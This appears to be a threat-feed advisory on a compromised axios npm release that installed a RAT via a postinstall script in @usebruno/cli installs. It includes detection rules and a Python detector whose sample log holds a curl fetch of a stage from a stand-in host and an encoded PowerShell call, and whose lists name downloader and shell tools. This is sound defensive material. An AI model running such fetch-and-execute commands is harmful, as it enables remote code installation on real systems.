Threat Feed
critical advisory

Compromised Axios Library Leads to RAT Deployment via @usebruno/cli

Compromised versions of the `axios` npm package introduced a hidden dependency deploying a cross-platform Remote Access Trojan (RAT), impacting users of `@usebruno/cli` who ran `npm install` between 00:21 UTC and ~03:30 UTC on March 31, 2026, potentially leading to credential exfiltration.

On March 31, 2026, a supply chain attack targeted the axios npm package, a widely used HTTP client library for JavaScript. Versions 1.14.1 and 0.30.4 of the library were published with injected malicious code that installed a cross-platform Remote Access Trojan (RAT) on systems where @usebruno/cli pulled in one of those versions as a dependency. The attack specifically impacted users of @usebruno/cli who performed an npm install within a roughly 3-hour window, between 00:21 UTC and 03:30 UTC. The malicious code was designed to execute during the postinstall phase of package installation, indicating a targeted effort to compromise developer environments. The incident highlights the growing risk of supply chain attacks against open-source software and the importance of verifying the integrity of third-party dependencies.

Attack Chain

  1. Attacker compromises the axios npm package, injecting malicious code into versions 1.14.1 and 0.30.4.
  2. The compromised axios package is published to the npm registry.
  3. A user of @usebruno/cli executes npm install within the attack window (00:21 UTC - 03:30 UTC on March 31, 2026).
  4. The npm package manager resolves the dependency chain and downloads the compromised axios package as a dependency of @usebruno/cli.
  5. The malicious code within the axios package executes during the postinstall script phase of the installation process.
  6. The postinstall script downloads and installs a cross-platform Remote Access Trojan (RAT) on the user’s system.
  7. The RAT establishes a connection to a remote command-and-control (C2) server.
  8. The attacker uses the RAT to exfiltrate credentials and other sensitive data from the compromised system.

Impact

This supply chain attack could have resulted in widespread compromise of developer systems that used the @usebruno/cli. While the number of affected users is unknown, the incident could have led to the exfiltration of sensitive credentials and proprietary source code, potentially enabling further attacks against the affected organizations and their customers. The incident underscores the need for robust security measures in software development pipelines and continuous monitoring of third-party dependencies for malicious activity.

Recommendation

  • If @usebruno/cli was installed during the affected window, reinstall dependencies to ensure a clean version of axios is used (reference: Impact section).
  • Rotate all credentials and secrets that were present on systems where @usebruno/cli was installed during the affected window (reference: Impact section).
  • Review and implement the security guidance provided in the Aikido Security blog post to further harden your systems (reference: https://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat).
  • Monitor process creation events for unusual processes spawned by npm or node processes, using the provided Sigma rule (reference: Sigma rule - “Detect Suspicious Process Spawned by NPM”).

Detection coverage (2 rules)

Detect Suspicious Process Spawned by NPM (severity: high)

Detects suspicious processes spawned by npm or node, which could indicate malicious activity during package installation.

Format: Sigma | Tactics: execution | Techniques: T1059.003 | Log source: process_creation (windows|linux|macos)

Detect Outbound Network Connection from postinstall Script (severity: medium)

Detects network connections initiated from a process spawned during the postinstall phase, which could indicate a RAT calling home.

Format: Sigma | Tactics: command_and_control | Techniques: T1071.001 | Log source: network_connection (windows|linux|macos)
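The following is an added example, not the platform's Sigma rule, showing the kind of logic the "Detect Suspicious Process Spawned by NPM" rule above expresses, run over constructed process_creation events. The field names (ParentImage, Image, CommandLine), the parent and child process lists, and the allowlist are assumptions a defender would tune to their own telemetry.

```python
"""Minimal process_creation detector for shells or downloaders spawned by
npm/node during a package install. Field names, process lists and the
allowlist are assumptions; the sample log below is constructed."""
import json
from typing import Iterable

# Assumed: npm lifecycle parents that should rarely spawn shells or downloaders
NPM_PARENTS = {"npm", "npm.cmd", "npx", "node", "node.exe"}
# Assumed: children that are unusual during a package install and worth triage
SUSPICIOUS_CHILDREN = {"sh", "bash", "zsh", "curl", "wget", "powershell.exe",
                       "pwsh", "cmd.exe", "python", "python3", "certutil.exe"}
# Assumed allowlist: legitimate build tooling that commonly runs via a shell
BUILD_TOOL_TOKENS = ("node-gyp", "tsc ", "webpack", "jest")


def basename(path: str) -> str:
    """Return the executable name regardless of platform path separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_suspicious(event: dict) -> bool:
    """True when an npm/node parent spawns a shell or downloader child and the
    command line does not name a known build tool."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in NPM_PARENTS or child not in SUSPICIOUS_CHILDREN:
        return False
    cmd = event.get("CommandLine", "").lower()
    return not any(tok in cmd for tok in BUILD_TOOL_TOKENS)


def scan(lines: Iterable[str]) -> list[dict]:
    """Parse JSON-per-line process_creation events and return the hits."""
    hits = []
    for line in lines:
        if line.strip():
            event = json.loads(line)
            if is_suspicious(event):
                hits.append(event)
    return hits


# Constructed sample telemetry (not captured from the incident)
SAMPLE_LOG = r"""
{"ParentImage": "/usr/bin/node", "Image": "/bin/sh", "CommandLine": "sh -c \"curl -s http://example.invalid/stage\""}
{"ParentImage": "/usr/bin/node", "Image": "/bin/sh", "CommandLine": "sh -c node-gyp rebuild"}
{"ParentImage": "/usr/bin/bash", "Image": "/usr/bin/curl", "CommandLine": "curl https://registry.npmjs.org/"}
{"ParentImage": "C:\\Program Files\\nodejs\\node.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -enc AAAA"}
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print("ALERT:", hit["ParentImage"], "->", hit["Image"], "|", hit["CommandLine"])
```

Of the four constructed events, the two shell/PowerShell children of node with no build-tool marker are flagged; the node-gyp rebuild and the curl started from a user's bash are not.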


Indicators of compromise (1)

  Type: url
  Value: https://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat